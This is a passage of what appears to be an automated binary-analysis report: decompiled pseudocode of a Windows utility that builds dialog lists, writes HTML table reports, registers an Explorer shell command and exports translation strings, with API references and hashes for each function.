                                                                                                                				_t119 = 1;
                                                                                                                				do {
                                                                                                                					_t17 = _t119 + 0x280; // 0x281
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t119 = _t119 + 1;
                                                                                                                				} while (_t119 <= 9);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                                				_t121 = 1;
                                                                                                                				do {
                                                                                                                					_t21 = _t121 + 0x294; // 0x295
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t121 = _t121 + 1;
                                                                                                                				} while (_t121 <= 3);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                                				_t122 = 0;
                                                                                                                				do {
                                                                                                                					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t122 = _t122 + 1;
                                                                                                                				} while (_t122 <= 0xd);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                                				_t123 = 0;
                                                                                                                				do {
                                                                                                                					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t123 = _t123 + 1;
                                                                                                                					_t143 = _t123 - 3;
                                                                                                                				} while (_t123 < 3);
                                                                                                                				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                                				E00403EC3(GetDlgItem, _t113);
                                                                                                                				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				_t88 = E00402D78(_t113, _t143);
                                                                                                                				E00402BEE(_t113);
                                                                                                                				return _t88;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				void _v138;
                                                                                                                				long _v140;
                                                                                                                				void _v242;
                                                                                                                				char _v244;
                                                                                                                				void _v346;
                                                                                                                				char _v348;
                                                                                                                				void _v452;
                                                                                                                				void _v962;
                                                                                                                				signed short _v964;
                                                                                                                				void* __esi;
                                                                                                                				void* _t87;
                                                                                                                				wchar_t* _t109;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t140;
                                                                                                                				signed int _t153;
                                                                                                                				intOrPtr* _t154;
                                                                                                                				signed int _t156;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t159;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_t124 = __ebx;
                                                                                                                				_v964 = _v964 & 0x00000000;
                                                                                                                				memset( &_v962, 0, 0x1fc);
                                                                                                                				_t125 = 0x18;
                                                                                                                				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                				asm("movsw");
                                                                                                                				_t153 = 0;
                                                                                                                				_v244 = 0;
                                                                                                                				memset( &_v242, 0, 0x62);
                                                                                                                				_v348 = 0;
                                                                                                                				memset( &_v346, 0, 0x62);
                                                                                                                				_v140 = 0;
                                                                                                                				memset( &_v138, 0, 0x62);
                                                                                                                				_t161 = _t159 + 0x3c;
                                                                                                                				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                                				if(_t87 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_t87,  &_v964));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0x32);
                                                                                                                					_push( &_v244);
                                                                                                                					L0040B1EC();
                                                                                                                					_t161 = _t161 + 0x18;
                                                                                                                				}
                                                                                                                				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                				_v8 = _t153;
                                                                                                                				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                                					while(1) {
                                                                                                                						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                                						_v12 = _t156;
                                                                                                                						_t157 = _t156 * 0x14;
                                                                                                                						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                                							wcscpy( &_v140, L" nowrap");
                                                                                                                						}
                                                                                                                						_v32 = _v32 | 0xffffffff;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _t153;
                                                                                                                						_t154 = _a8;
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                                						E0040ADC0(_v32,  &_v348);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                                						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                                						} else {
                                                                                                                							_push( *(_t157 + _v16 + 0x10));
                                                                                                                							_push(E0040ADC0(_t106,  &_v964));
                                                                                                                							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                							_push(0x2000);
                                                                                                                							_push( *(_t124 + 0x68));
                                                                                                                							L0040B1EC();
                                                                                                                							_t161 = _t161 + 0x14;
                                                                                                                						}
                                                                                                                						_t109 =  *(_t124 + 0x64);
                                                                                                                						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                							wcscat(_t109, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                                						_push( &_v140);
                                                                                                                						_push( &_v348);
                                                                                                                						_push( *(_t124 + 0x68));
                                                                                                                						_push( &_v244);
                                                                                                                						_push( &_v452);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t161 = _t161 + 0x28;
                                                                                                                						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						_t153 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L14:
                                                                                                                				E00407343(_t124, _a4, L"</table><p>");
                                                                                                                				return E00407343(_t124, _a4, L"\r\n");
                                                                                                                			}
































                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				long _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				char _v2564;
                                                                                                                				char _v35332;
                                                                                                                				char _t51;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				void* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                
                                                                                                                				E0040B550(0x8a00, __ecx);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x1fc);
                                                                                                                				_v1540 = 0;
                                                                                                                				memset( &_v1538, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t79 = _t78 + 0x24;
                                                                                                                				if(_a20 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t79 = _t79 + 0x18;
                                                                                                                				}
                                                                                                                				if(_a24 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                                					_push(L"<font color=\"%s\">");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v1540);
                                                                                                                					L0040B1EC();
                                                                                                                					wcscpy( &_v1028, L"</font>");
                                                                                                                					_t79 = _t79 + 0x20;
                                                                                                                				}
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                				_push(0x3fff);
                                                                                                                				_push( &_v35332);
                                                                                                                				L0040B1EC();
                                                                                                                				_t80 = _t79 + 0x10;
                                                                                                                				E00407343(_a4, _a8,  &_v35332);
                                                                                                                				_t51 = _a16;
                                                                                                                				if(_t51 > 0) {
                                                                                                                					_t73 = _a12 + 4;
                                                                                                                					_a20 = _t51;
                                                                                                                					do {
                                                                                                                						_v516 = 0;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						_t54 =  *_t73;
                                                                                                                						_t81 = _t80 + 0xc;
                                                                                                                						if( *_t54 == 0) {
                                                                                                                							_v516 = 0;
                                                                                                                						} else {
                                                                                                                							_push(_t54);
                                                                                                                							_push(L" width=\"%s\"");
                                                                                                                							_push(0xff);
                                                                                                                							_push( &_v516);
                                                                                                                							L0040B1EC();
                                                                                                                							_t81 = _t81 + 0x10;
                                                                                                                						}
                                                                                                                						_push( &_v1028);
                                                                                                                						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                						_push( &_v1540);
                                                                                                                						_push( &_v516);
                                                                                                                						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                						_push(0x3fff);
                                                                                                                						_push( &_v35332);
                                                                                                                						L0040B1EC();
                                                                                                                						_t80 = _t81 + 0x1c;
                                                                                                                						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                                						_t73 = _t73 + 8;
                                                                                                                						_t36 =  &_a20;
                                                                                                                						 *_t36 = _a20 - 1;
                                                                                                                					} while ( *_t36 != 0);
                                                                                                                					return _t61;
                                                                                                                				}
                                                                                                                				return _t51;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				short _v32;
                                                                                                                				void _v2078;
                                                                                                                				signed int _v2080;
                                                                                                                				void _v4126;
                                                                                                                				char _v4128;
                                                                                                                				void _v6174;
                                                                                                                				char _v6176;
                                                                                                                				void _v8222;
                                                                                                                				char _v8224;
                                                                                                                				signed int _t49;
                                                                                                                				short _t55;
                                                                                                                				intOrPtr _t56;
                                                                                                                				int _t73;
                                                                                                                				intOrPtr _t78;
                                                                                                                
                                                                                                                				_t76 = __ecx;
                                                                                                                				E0040B550(0x201c, __ecx);
                                                                                                                				_t73 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                                					L6:
                                                                                                                					return _t73;
                                                                                                                				}
                                                                                                                				_v6176 = 0;
                                                                                                                				memset( &_v6174, 0, 0x7fe);
                                                                                                                				_t78 = _a4;
                                                                                                                				_push(_t78 + 0x20a);
                                                                                                                				_push(_t78);
                                                                                                                				_push(L"%s\\shell\\%s\\command");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v6176);
                                                                                                                				L0040B1EC();
                                                                                                                				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                                					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                					_t73 =  ~_t49 + 1;
                                                                                                                					RegCloseKey(_v12);
                                                                                                                					_v2080 = _v2080 & 0x00000000;
                                                                                                                					memset( &_v2078, 0, 0x7fe);
                                                                                                                					E00404AD9( &_v2080);
                                                                                                                					if(_v2078 == 0x3a) {
                                                                                                                						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                                						_v32 = _t55;
                                                                                                                						_t56 =  *0x40ccdc; // 0x5c
                                                                                                                						_v28 = _t56;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						_v32 = _v2080;
                                                                                                                						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                                							_v4128 = 0;
                                                                                                                							memset( &_v4126, 0, 0x7fe);
                                                                                                                							_v8224 = 0;
                                                                                                                							memset( &_v8222, 0, 0x7fe);
                                                                                                                							_push(_a4 + 0x20a);
                                                                                                                							_push(_a4);
                                                                                                                							_push(L"%s\\shell\\%s");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v8224);
                                                                                                                							L0040B1EC();
                                                                                                                							_push( &_v2080);
                                                                                                                							_push(L"\"%s\",0");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v4128);
                                                                                                                							L0040B1EC();
                                                                                                                							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				RegCloseKey(_v8);
                                                                                                                				goto L6;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                                				void _v530;
                                                                                                                				char _v532;
                                                                                                                				void _v1042;
                                                                                                                				long _v1044;
                                                                                                                				long _v4116;
                                                                                                                				char _v5164;
                                                                                                                				void* __edi;
                                                                                                                				void* _t27;
                                                                                                                				void* _t38;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				E0040B550(0x142c, __ecx);
                                                                                                                				_v1044 = 0;
                                                                                                                				memset( &_v1042, 0, 0x1fc);
                                                                                                                				_v532 = 0;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_pop(_t44);
                                                                                                                				E00405AA7( &_v5164);
                                                                                                                				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                                				_t61 = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					wcscpy( &_v1044,  &_v4116);
                                                                                                                					_pop(_t44);
                                                                                                                				}
                                                                                                                				wcscpy(0x40fb90, _a8);
                                                                                                                				wcscpy(0x40fda0, L"general");
                                                                                                                				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                                				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                                				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                                				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                                				wcscpy(0x40fda0, L"strings");
                                                                                                                				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                                				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                                				return _t38;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				int _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				char _v52;
                                                                                                                				char _v60;
                                                                                                                				void _v315;
